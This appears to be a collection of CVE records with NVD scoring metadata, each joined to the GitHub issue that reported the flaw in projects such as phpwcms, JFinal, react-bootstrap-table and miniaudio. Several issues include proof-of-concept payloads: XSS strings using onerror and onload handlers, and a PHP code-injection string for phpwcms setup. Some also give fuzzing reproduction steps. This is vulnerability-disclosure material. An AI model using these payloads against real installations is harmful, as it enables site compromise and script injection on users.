[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LoRexxar/CVE_Request/tree/master/gnuboard5%20mul%20vuls%20before%20v5.3.2.8#limited-reflective-xss-in-bbsloginphp" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gnuboard/gnuboard5/issues/43" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.seebug.org/vuldb/ssvid-97925" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LoRexxar/CVE_Request/tree/master/gnuboard5%20mul%20vuls%20before%20v5.3.2.8#limited-reflective-xss-in-bbsloginphp" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gnuboard/gnuboard5/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.seebug.org/vuldb/ssvid-97925" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sir:gnuboard:*:*:*:*:*:*:*:*", "matchCriteriaId": "48830A72-A234-440B-832F-81BFBBD9ABC3", "versionEndExcluding": null, "versionEndIncluding": "5.3.2.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gnuboard/gnuboard5/issues/43
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gnuboard", "gnuboard5" ]
Some security vulnerabilities in v5.3.2.8 - limited Reflective xss in bbs/login.php - Reflective xss in bbs/move_update.php - SQL injection in install_db.php the details of these vulnerabilities to see https://github.com/LoRexxar/CVE_Request/tree/master/gnuboard5%20mul%20vuls%20before%20v5.3.2.8
Some security vulnerabilities in v5.3.2.8
https://api.github.com/repos/gnuboard/gnuboard5/issues/43/comments
4
2019-04-29T09:24:29Z
2024-10-02T13:48:56Z
https://github.com/gnuboard/gnuboard5/issues/43
438,223,261
43
2,110
CVE-2021-23398
2021-06-24T15:15:08.210
All versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://github.com/AllenFang/react-bootstrap-table/blob/26d07defab759e4f9bce22d1d568690830b8d9d7/src/TableBody.js%23L114-L118" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AllenFang/react-bootstrap-table/issues/2071" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314286" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-REACTBOOTSTRAPTABLE-1314285" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/AllenFang/react-bootstrap-table/blob/26d07defab759e4f9bce22d1d568690830b8d9d7/src/TableBody.js%23L114-L118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AllenFang/react-bootstrap-table/issues/2071" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-REACTBOOTSTRAPTABLE-1314285" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:react-bootstrap-table_project:react-bootstrap-table:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD24DDAD-A599-4605-A09D-56F0F298733A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/AllenFang/react-bootstrap-table/issues/2071
[ "Exploit", "Third Party Advisory" ]
github.com
[ "AllenFang", "react-bootstrap-table" ]
Hi When using dataFormat function and not converting the value to react component output is not sanitised. Therefore you can easily run XSS through it. ``` const Demo = props => { let data = [ {key: "1", value: "test"}, {key: "2", value: '/1337"><noscript><p title="</noscript><img src=x onerror=alert`openbugbounty`>">'} ] return ( <BootstrapTable data={data}> <TableHeaderColumn dataField="key" isKey /> <TableHeaderColumn dataField="value" dataFormat={v => v} /> </BootstrapTable> ); }; ``` Example: https://codesandbox.io/s/q7oj2v6xo9?fontsize=14
XSS when using dataFormat function
https://api.github.com/repos/AllenFang/react-bootstrap-table/issues/2071/comments
2
2019-04-18T11:30:31Z
2021-12-22T21:21:20Z
https://github.com/AllenFang/react-bootstrap-table/issues/2071
434,723,168
2,071
2,111
CVE-2021-33348
2021-06-24T15:15:08.297
An issue was discovered in JFinal framework v4.9.10 and below. The "set" method of the "Controller" class of jfinal framework is not strictly filtered, which will lead to XSS vulnerabilities in some cases.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jfinal/jfinal/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jfinal/jfinal/issues/188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jfinal:jfinal:*:*:*:*:*:*:*:*", "matchCriteriaId": "9A006872-9B30-4089-89C8-00449B593C94", "versionEndExcluding": null, "versionEndIncluding": "4.9.10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jfinal/jfinal/issues/188
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jfinal", "jfinal" ]
The main reason is that the controller does not filter the parameters during rendering, which leads to malicious input of users and may lead to XSS ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/4.png) I wrote a demo: Controller ```java @Path("/test") public class TestController extends Controller{ public void index() { String param = getPara("param"); System.out.println(param); set("param", param); render("test.html"); } } ``` test.html ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> <body> #(param) </body> </html> ``` The request parameter is "param",payload is `http://[your-ip]/test?param=<svg/onload='alert(1)'>` If the user's input is output directly, XSS will be caused after the controller's set method is set. If the malicious parameters of controller are taken from the database, XSS vulnerability will be stored - Repair The `attributeValue` should be judged before the set method calls `request.setAttribute`. If it is in string format, the harmful characters should be filtered, such as `<script>` ```java public Controller set(String attributeName, Object attributeValue) { request.setAttribute(attributeName, attributeValue); return this; } ```
There are XSS vulnerabilities in some cases
https://api.github.com/repos/jfinal/jfinal/issues/188/comments
2
2021-05-13T02:04:35Z
2021-06-28T01:45:46Z
https://github.com/jfinal/jfinal/issues/188
890,632,602
188
2,112
CVE-2020-21784
2021-06-24T16:15:08.343
phpwcms 1.9.13 is vulnerable to Code Injection via /phpwcms/setup/setup.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/286" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/286" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpwcms:phpwcms:1.9.13:*:*:*:*:*:*:*", "matchCriteriaId": "709B95C0-358F-4C68-AD18-21C1E3B2FDC5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/slackero/phpwcms/issues/286
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slackero", "phpwcms" ]
## Test version VERSION 1.9.13, RELEASE 2020/01/10 ## Code audit ### setup.php code Open the secure boot file setup.php,the file path is ```/phpwcms/setup/setup.php```.Then it include ```/phpwcms/setup/inc/setup.check.inc.php``` in line 24. ![image](https://user-images.githubusercontent.com/43197505/72501209-39c6a100-3871-11ea-9e34-7bd438750616.png) ### setup.check.inc.php code open file ```/phpwcms/setup/inc/setup.check.inc.php``` and you can see line 35. ![image](https://user-images.githubusercontent.com/43197505/72501380-932ed000-3871-11ea-8911-0fcfbd9b4b28.png) ### setup.func.inc.php code tarck the function write_conf_file() in ```/phpwcms/setup/inc/setup.func.inc.php``` in line 119. ![image](https://user-images.githubusercontent.com/43197505/72501497-ee60c280-3871-11ea-9ae2-fdda335c02f1.png) and in line 293,it will call function write_textfile() to write the config file in line 35. ![image](https://user-images.githubusercontent.com/43197505/72501526-fc164800-3871-11ea-8a09-7ba40c1f02a6.png) ![image](https://user-images.githubusercontent.com/43197505/72501564-1ea86100-3872-11ea-8612-b98908a1c859.png) ## Testing getshell in this interface,you can input some infomation like this. ![image](https://user-images.githubusercontent.com/43197505/72501648-53b4b380-3872-11ea-900f-653173da24f0.png) ### payload ``` root';phpinfo();$test='a ``` After completing it, click Submit.It will show some error information,but you can access like this address and you can see it run the injection code. ![image](https://user-images.githubusercontent.com/43197505/72501769-af7f3c80-3872-11ea-880e-8b9c2448d80f.png) ## Solution Filtering some sensitive characters.
Code Injection Vulnerability can Getshell
https://api.github.com/repos/slackero/phpwcms/issues/286/comments
1
2020-01-16T07:16:02Z
2020-01-17T15:22:16Z
https://github.com/slackero/phpwcms/issues/286
550,619,594
286
2,113
CVE-2020-18670
2021-06-24T19:15:08.233
Cross Site Scripting (XSS) vulneraibility in Roundcube mail .4.4 via database host and user in /installer/test.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/issues/7406" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lorexxar.cn/2020/06/10/roundcube-mail-xss/#Store-Xss-in-installer-test-php" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://roundcube.net/news/2020/06/02/security-updates-1.4.5-and-1.3.12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/issues/7406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://lorexxar.cn/2020/06/10/roundcube-mail-xss/#Store-Xss-in-installer-test-php" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://roundcube.net/news/2020/06/02/security-updates-1.4.5-and-1.3.12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:roundcube:webmail:1.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "0DC944E9-76A5-4313-A21F-828B9BE16283", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/roundcube/roundcubemail/issues/7406
[ "Patch", "Third Party Advisory" ]
github.com
[ "roundcube", "roundcubemail" ]
There are three security issues in Roundcube mail 1.4.4: - Store Xss via database host and user in /installer/test.php - Store Xss via smtp config in /installer/test.php - Store Xss via imap settings in database Vulnerability details have been sent via email.
security issue
https://api.github.com/repos/roundcube/roundcubemail/issues/7406/comments
3
2020-05-29T04:29:34Z
2020-06-02T03:01:06Z
https://github.com/roundcube/roundcubemail/issues/7406
626,989,218
7,406
2,114
CVE-2021-34184
2021-06-25T15:15:08.040
Miniaudio 0.10.35 has a Double free vulnerability that could cause a buffer overflow in ma_default_vfs_close__stdio in miniaudio.h.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mackron/miniaudio/issues/319" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mackron/miniaudio/issues/319" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniaudio_project:miniaudio:0.10.35:*:*:*:*:*:*:*", "matchCriteriaId": "FCFA5DA7-3190-41B7-9D58-8FE2BF601572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/mackron/miniaudio/issues/319
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "mackron", "miniaudio" ]
Hi Team, Double-Free vulnerability cause buffer overflow is observed in [miniaudio.h](https://github.com/mackron/miniaudio/blob/master/miniaudio.h) while fuzzing **MINIAUDIO (v0.10.35 and master branch)** using **ASAN** with **AFL FUZZER** **Steps to Reproduce -** cd examples afl-gcc -fsanitize=address -fsanitize=leak -fsanitize=undefined simple_looping.c -o simple_looping -ldl -lm -lpthread ./simple_looping POC1 Download link to [POC1](https://github.com/x00x00x00x00/miniaudio/raw/main/POC1) **OUTPUT -** ================================================================= ==2775==ERROR: AddressSanitizer: attempting double-free on 0x615000000080 in thread T0: -0 0x7f68180667cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf) -1 0x7f6817307042 in _IO_fclose (/lib/x86_64-linux-gnu/libc.so.6+0x85042) -2 0x7f6818064908 in __interceptor_fclose (/lib/x86_64-linux-gnu/libasan.so.5+0x10b908) -3 0x5649865b7e0b in ma_default_vfs_close__stdio ../miniaudio.h:44307 -4 0x5649865b7e0b in ma_default_vfs_close ../miniaudio.h:44491 -5 0x5649865b7e0b in ma_vfs_or_default_close ../miniaudio.h:44624 -6 0x5649865b7e0b in ma_vfs_or_default_close ../miniaudio.h:44619 -7 0x5649865b7e0b in ma_decoder_init_vfs ../miniaudio.h:47429 -8 0x564986018047 in ma_decoder_init_file ../miniaudio.h:47768 -9 0x564986018047 in main /home/zero/newfuz/audio/1/examples/simple_looping.c:43 -10 0x7f68172a90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) -11 0x56498601889d in _start (/home/zero/newfuz/audio/1/examples/simple_looping+0x30c89d) 0x615000000080 is located 0 bytes inside of 472-byte region [0x615000000080,0x615000000258) freed by thread T0 here: -0 0x7f68180667cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf) -1 0x7f6817307042 in _IO_fclose (/lib/x86_64-linux-gnu/libc.so.6+0x85042) previously allocated by thread T0 here: -0 0x7f6818066bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) -1 0x7f6817307aad in _IO_fopen (/lib/x86_64-linux-gnu/libc.so.6+0x85aad) SUMMARY: AddressSanitizer: double-free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf) in __interceptor_free ==2775==ABORTING **Request team to implement proper patch and validate**
Double free vulnerability cause buffer overflow
https://api.github.com/repos/mackron/miniaudio/issues/319/comments
1
2021-06-06T15:45:59Z
2021-06-11T09:05:22Z
https://github.com/mackron/miniaudio/issues/319
912,868,849
319
2,115
CVE-2021-34185
2021-06-25T15:15:08.083
Miniaudio 0.10.35 has an integer-based buffer overflow caused by an out-of-bounds left shift in drwav_bytes_to_u32 in miniaudio.h
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mackron/miniaudio/issues/320" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mackron/miniaudio/issues/320" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:miniaudio_project:miniaudio:0.10.35:*:*:*:*:*:*:*", "matchCriteriaId": "FCFA5DA7-3190-41B7-9D58-8FE2BF601572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/mackron/miniaudio/issues/320
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mackron", "miniaudio" ]
Hi Team, Integer based buffer overflow caused by out-of-bound left shift is observed in [miniaudio.h](https://github.com/mackron/miniaudio/blob/master/miniaudio.h) while fuzzing **MINIAUDIO (v0.10.35 and master branch)** using **UBSAN** enabled in **AFL FUZZER** **Vulnerable code from miniaudio.h -** DRWAV_API drwav_uint32 drwav_bytes_to_u32(const drwav_uint8* data) { return (data[0] << 0) | (data[1] << 8) | (data[2] << 16) | (data[3] << 24); } **Steps to Reproduce -** cd examples afl-gcc -fsanitize=address -fsanitize=leak -fsanitize=undefined simple_looping.c -o simple_looping -ldl -lm -lpthread ./simple_looping POC2 Download link to [POC2](https://github.com/x00x00x00x00/miniaudio/raw/main/POC2) **OUTPUT -** ../miniaudio.h:52991:73: runtime error: left shift of 128 by 24 places cannot be represented in type 'int' **Request team to implement proper patch and validate**
Integer based buffer overflow vulnerability
https://api.github.com/repos/mackron/miniaudio/issues/320/comments
1
2021-06-06T15:51:52Z
2021-06-11T09:52:59Z
https://github.com/mackron/miniaudio/issues/320
912,870,422
320
2,116
CVE-2021-35513
2021-06-27T12:15:08.100
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/issues/2122" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/pull/2123" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/issues/2122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/pull/2123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mermaid_project:mermaid:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "711D752C-A6F0-4968-BB41-62BA28F6EFE2", "versionEndExcluding": "8.11.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mermaid-js/mermaid/issues/2122
[ "Third Party Advisory" ]
github.com
[ "mermaid-js", "mermaid" ]
Antiscript option should remove javascript urls
Antiscript option should remove javascript urls
https://api.github.com/repos/mermaid-js/mermaid/issues/2122/comments
0
2021-06-08T17:31:30Z
2021-06-08T19:48:38Z
https://github.com/mermaid-js/mermaid/issues/2122
915,280,869
2,122
2,117
CVE-2021-34254
2021-06-28T16:15:08.743
Umbraco CMS before 7.15.7 is vulnerable to Open Redirection due to insufficient url sanitization on booting.aspx.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
